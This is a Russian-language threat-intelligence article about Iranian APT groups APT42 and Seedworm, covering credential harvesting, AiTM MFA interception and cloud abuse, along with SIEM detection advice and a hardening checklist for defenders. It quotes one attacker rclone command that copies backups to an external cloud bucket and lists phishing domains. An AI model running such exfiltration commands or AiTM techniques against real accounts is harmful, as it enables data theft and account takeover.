Статья APT42 и Seedworm: credential harvesting через социальную инженерию — как иранские APT крадут учётные данные без малвари

В 2024 году APT42 взломала предвыборный штаб Трампа, утянула внутренние документы и попыталась слить их журналистам. Без единого вредоносного вложения. Ни EXE, ни макроса, ни PowerShell-дроппера - чистая социальная инженерия и перехват сессий. Seedworm (MuddyWater), по публичным отчётам, предположительно сидела в сетях ряда американских организаций с persistence, заложенным до начала военной эскалации в регионе. Два иранских APT, два разных ведомства, одна стратегическая цель: учётные данные людей, принимающих решения.

Цифры подтверждают тренд: CrowdStrike Global Threat Report 2025 - 75% вторжений используют действительные учётные данные. IBM X-Force фиксирует рост таких атак на 71% за год. Иранские группировки среди тех, кто этот тренд формирует.

Два мандата, одна цель: APT42 и Seedworm в иранском кибершпионаже​

Путаница между иранскими APT - головная боль для аналитиков. APT42 и Seedworm работают по разным мандатам с разными kill chain, но нацелены на один результат: доступ к чужим аккаунтам и разведданным. Подробнее - в нашем статье об атаках на аутентификацию.

Параметр	APT42 (Charming Kitten)	Seedworm (MuddyWater)
Куратор	IRGC-IO (разведка КСИР)	MOIS (Минразведки)
Активны с	2015	2017
Основной метод	Социальная инженерия, credential harvesting	Malware, RMM-tools abuse
Цели	Люди: журналисты, исследователи, диссиденты, политконсультанты	Организации: телеком, оборонка, госсектор, нефтегаз
Подход к MFA	AiTM-перехват токенов в реальном времени	Credential stuffing, malware-based initial access
Облачные операции	Living off the cloud - встроенные функции M365	Эксфильтрация через Rclone в облачные хранилища
Роль	Разведка по конкретным персонам	Initial access broker - делится доступом с другими группами
Алиасы	Charming Kitten, TA453 (Proofpoint), ITG18 (IBM), Yellow Garuda (PwC); Mint Sandstorm - расширенный Microsoft-кластер, включающий APT42 и APT35	Temp Zagros, Static Kitten

По данным Google Cloud (Mandiant), APT42 атакует конкретных людей - не по месту работы, а по тому, кто они, что знают и с кем общаются. Выбор жертв отражает разведывательные потребности IRGC-IO: мониторинг внешних угроз Исламской Республике и подавление инакомыслия. В 2024 году DOJ предъявил обвинения трём лицам, связанным с IRGC, за кибероперации против предвыборных кампаний. Группа продолжила работать.

Seedworm, по данным CISA, - подразделение MOIS с подтверждённой ролью initial access broker. По публичным отчётам, Seedworm предположительно наращивает инструментарий: упоминаются RustyWater (Rust-based RAT), а также злоупотребление RMM-инструментами Syncro и PDQ Connect, установленными на сетях сторонними IT-интеграторами. То есть Seedworm заходит через софт, который ваш же подрядчик поставил.

Для SOC-аналитика принципиальна разница в detection surface. APT42 генерирует минимум артефактов на эндпоинтах - активность уходит в облачные логи и proxy. Seedworm оставляет следы на хостах: подписанные бэкдоры, persistence через реестр, DNS-туннелирование. Алерты от двух групп прилетают из разных источников, и это требует разных detection pipeline.

Kill chain credential harvesting: от первого письма до компрометации облака​

Три кластера фишинговой инфраструктуры APT42 и adversary-in-the-middle​

По отчёту Google Cloud, APT42 использует три кластера инфраструктуры. Кластер A маскируется под СМИ и аналитические центры - тайпосквоттинговые домены вроде washinqtonpost[.]press. Поддельные бренды The Washington Post, The Economist, The Jerusalem Post, Aspen Institute. Сами организации не скомпрометированы - их имена используются как обёртка. Кластер B маскируется под легитимные сервисы: Dropbox, Google Meet, YouTube. Домены с кучей слов через дефис (panel-live-check[.]online, review[.]modification-check[.]online). Фишинговые страницы размещаются на Google Sites, OneDrive, Cloudflare Workers - трафик смешивается с легитимной активностью. Блокировка по домену бессмысленна, когда страница живёт на sites[.]google[.]com. Кластер C заточен под генерацию MFA push-уведомлений (T1621, Credential Access).

Все три кластера объединяет один паттерн: легитимный первый контакт через email, WhatsApp или Telegram -> построение доверия неделями -> фишинговая ссылка. Первые сообщения чисты. Приглашение дать комментарий для статьи. Предложение выступить на конференции. Ни один антифишинг это не поймает, потому что ловить нечего. По MITRE ATT&CK: Impersonation (T1684, Defense Evasion) на этапе построения rapport, Phishing for Information: Spearphishing Link (T1598.003, Reconnaissance) на этапе сбора данных через доверие, Spearphishing Link (T1566.002, Initial Access) на этапе доставки финальной фишинговой ссылки.

Центральная техника APT42 - adversary-in-the-middle (AiTM), маппинг на Multi-Factor Authentication Interception (T1111, Credential Access). Жертва вводит логин, пароль и TOTP-код на клонированной странице. Инфраструктура APT42 мгновенно ретранслирует данные на реальный сервис и перехватывает сессионный cookie (T1539, Steal Web Session Cookie). Для пентестеров: механика один-в-один с EvilGinx2 или Modlishka - reverse proxy между жертвой и легитимным сервисом. Разница - кастомные фишинговые киты APT42, регулярно обновляемые и не детектируемые по публичным сигнатурам. По данным Mandiant, AiTM через клонированный сайт иногда давал сбои (токен протухал), после чего группа переключилась на MFA push bombing (T1621): оператор инициирует реальный вход, жертва одобряет push-уведомление. По отчёту Google Cloud, второй метод работал успешно.

Единственная категория MFA, устойчивая к AiTM - FIDO2/passkeys. Они криптографически привязаны к origin домена: фишинговая страница на panel-live-check[.]online физически не может получить ответ, адресованный accounts.google.com. Всё остальное - TOTP, SMS, push - перехватывается.

После перехвата сессии: living off the cloud​

Получив доступ, APT42 работает исключительно через встроенные функции облачных сервисов. По MITRE ATT&CK: Cloud Accounts (T1078.004, Defense Evasion / Persistence), Remote Email Collection (T1114.002, Collection).

Задокументированное поведение (Mandiant, Google Cloud):

• Регистрация собственного MFA-аутентификатора на аккаунте жертвы - persistence без малвари
• Чтение переписки в Outlook, скачивание документов из OneDrive и SharePoint
• Эксфильтрация файлов на OneDrive-аккаунт, замаскированный под аккаунт организации жертвы
• VPN и анонимизирующая инфраструктура для маскировки источника

Ни одного вредоносного файла внутри облачной среды. EDR на эндпоинте бесполезен. Вся активность - в облачных логах. Если вы не мониторите M365 Unified Audit Log с тем же вниманием, что и Windows Event Log, - вы слепы к этой атаке.

Seedworm 2026: Dindoor, Fakeset и скомпрометированные легитимные хосты​

В отличие от APT42, Seedworm традиционно опирается на malware. Но кампания 2026 года показывает движение к гибридной модели с элементами identity-based атак и злоупотреблением облачных сервисов.

По публичным отчётам Broadcom (Symantec), Seedworm предположительно обнаружена на сетях ряда американских организаций, включая финансовый сектор, транспортную инфраструктуру и поставщиков оборонной отрасли. Два бэкдора, атрибуция которых требует независимой верификации:

Dindoor [требует верификации] - по данным Broadcom, использует Deno runtime (JavaScript/TypeScript) для исполнения. Предположительно подписан сертификатом «Amy Cherne». Интересный выбор рантайма - Deno пока редкость в малвари, и большинство EDR не знают, как интерпретировать его поведение.

Fakeset [требует верификации] - Python-бэкдор. Предположительно подписан сертификатами «Amy Cherne» и «Donald Gay». По данным Broadcom, сертификат «Donald Gay» ранее использовался для подписи малвари, предположительно связываемой с Seedworm [названия Stagecomp/Darkcomp требуют верификации по первоисточнику Broadcom]. Загрузка - предположительно с серверов Backblaze.

Эксфильтрация данных - через Rclone в Wasabi cloud storage:

rclone copy CSIDL_DRIVE_FIXED\backups wasabi:[BUCKET]:/192.168.0.x

Ключевой сигнал: по данным Broadcom, Seedworm предположительно уже имела доступ к сетям до начала военной эскалации в регионе. Классический pre-positioning - скомпрометированные легитимные хосты, которые в мирное время выглядят как нормальная инфраструктура и не генерируют алертов. По данным CloudSEK, роль initial access broker означает, что компрометация Seedworm может привести к появлению другой группировки в сети позже: Seedworm заходит первой и передаёт доступ.

Для SOC это прямое следствие: обнаружение артефактов Seedworm на хосте - повод искать следы других иранских групп в облачных логах. Одна группа - это точка входа. Вторая может уже быть внутри.

Детектирование identity-based атак иранских APT в SIEM​

Облачные логи: правила корреляции для M365 и Azure AD​

Для APT42 основной detection surface - облачные логи. Три критических события:

Регистрация нового MFA-устройства после нетипичного входа. В Azure AD Audit Log - событие User registered security info. Корреляция: если за предшествующие 24 часа зафиксирован вход с нетипичного IP, через VPN-провайдера или Tor - красный флаг. Концептуальный запрос для Sentinel:

📚 Часть контента скрыта. Этот материал доступен участникам сообщества с рангом One Level или выше
Получить доступ просто — достаточно зарегистрироваться и проявить активность на форуме

Зарегистрироваться или Войти

Sigma-правило microsoft365_suspicious_email_delivered.yml из SigmaHQ покрывает детектирование подозрительных писем в M365. Для тестирования coverage по T1114.002 Atomic Red Team предоставляет тест Office365 - Remote Mail Collected (executor: powershell, platform: office-365) - требует подключения к реальному M365 tenant и позволяет верифицировать, что правила SIEM срабатывают на реальный трафик. Тест выполняется в контексте Office 365, а не на локальном Windows-хосте - Atomic Red Team для T1114.002 поддерживает только платформу office-365.

По D3FEND, ключевые контрмеры для Spearphishing Link (T1566.002): User Geolocation Logon Pattern Analysis (D3-UGLPA) и Protocol Metadata Anomaly Detection (D3-PMAD). Обе требуют выстроенного baseline нормального поведения пользователей. Без baseline корреляция невозможна - алерт не с чем сравнивать.

Proxy-логи, email-заголовки и индикаторы Seedworm​

Характерные паттерны APT42 в proxy-логах:

• POST-запросы к Google Sites с redirect на домены .top, .online, .site, .live
• URL-shortener n9[.]cl с перенаправлением на домены вида admin-stable-right[.]top
• Обращения к Dropbox API для загрузки PDF-приманок, за которыми следует переход на фишинговую страницу

При анализе email-заголовков (MXToolbox, Email Header Analyzer): Return-Path не совпадает с From - спуфинг. X-Originating-IP указывает на VPN/хостинг, а не на почтовый сервер отправителя. SPF/DKIM/DMARC могут проходить - APT42 использует легитимные почтовые сервисы для первого контакта, и это делает фильтрацию по репутации отправителя бесполезной.

Для Seedworm - другие индикаторы, на хостах:

• Подписанные бинарники с сертификатами «Amy Cherne» или «Donald Gay»
• DNS-запросы с высокой энтропией поддоменов (Mori backdoor, DNS-туннелирование)
• Telegram Bot API трафик с внутренних хостов (Small Sieve backdoor)
• Установка Syncro или PDQ Connect без авторизации IT-отдела

Чеклист hardening: credential harvesting без малвари​

1. FIDO2/passkeys для всех высокорисковых учётных записей. TOTP и push MFA не защищают от AiTM - это не рекомендация, это факт
2. Conditional Access в Azure AD: блокировка входов с нетипичных IP, требование compliant device
3. Алерт на User registered security info с корреляцией по IP и user agent
4. Аудит OAuth app registrations еженедельно. Алерт на новые consent с scope Mail.Read / Files.Read.All
5. Proxy-правила: алерт на TLD .top, .online, .site, .live в сочетании с POST к login-формам
6. DMARC в режиме reject для собственного домена
7. Baseline MailItemsAccessed: нормальный объём чтения почты для каждого пользователя - без этого baseline правило 2 не работает
8. Мониторинг URL-shortener (n9[.]cl, bit.ly) с redirect на фишинговые домены
9. Для Seedworm: алерт на установку RMM-инструментов (Syncro, PDQ Connect, AnyDesk) без заявки в IT. Мониторинг DNS-запросов с высокой энтропией поддоменов
10. Подписка на IOC-фиды по иранским APT (MISP CIRCL, Google TAG, CISA alerts). Автоматическое обогащение алертов

По Verizon DBIR 2025, 38% утечек связаны с украденными учётными данными, 36% начинаются с фишинга. Identity-based атаки - основной вектор. Иранские группировки показывают, как он работает на практике - от первого письма до эксфильтрации без единого артефакта на хосте.

Главная проблема не в APT42 и не в Seedworm. Проблема - в архитектуре detection у большинства SOC. Мониторинг выстроен вокруг эндпоинтов и периметра. EDR ловит малварь, NGFW фильтрует трафик. Но когда атакующий заходит с украденной сессией в M365 и работает через браузер - ни EDR, ни файрвол этого не увидят. Увидят облачные логи. А их мониторят с куда меньшим вниманием, чем Windows Event Log.

Медианное время обнаружения по Mandiant M-Trends 2025 - 11 дней. APT42 проводит эти дни в облаке жертвы: читает почту, скачивает документы из SharePoint, регистрирует собственный MFA-аутентификатор. SOC смотрит на эндпоинты и видит тишину.

В ближайшие год-два identity-based detection неизбежно станет первой линией обороны, а не «ещё одним источником логов». Группировки вроде APT42 уже доказали: полная разведывательная операция - от компрометации до эксфильтрации - проходит без единого артефакта на хосте. Кто перестроит detection-стек под эту реальность первым, тот будет ловить AiTM-сессии за минуты, а не за дни. На codeby.net коллеги разбирают практику детектирования облачных identity-атак в привязке к конкретным SIEM - если настраиваете правила под иранские TTP, полезно сверить наработки с теми, кто уже калибровал пороги на M365 и Azure AD логах.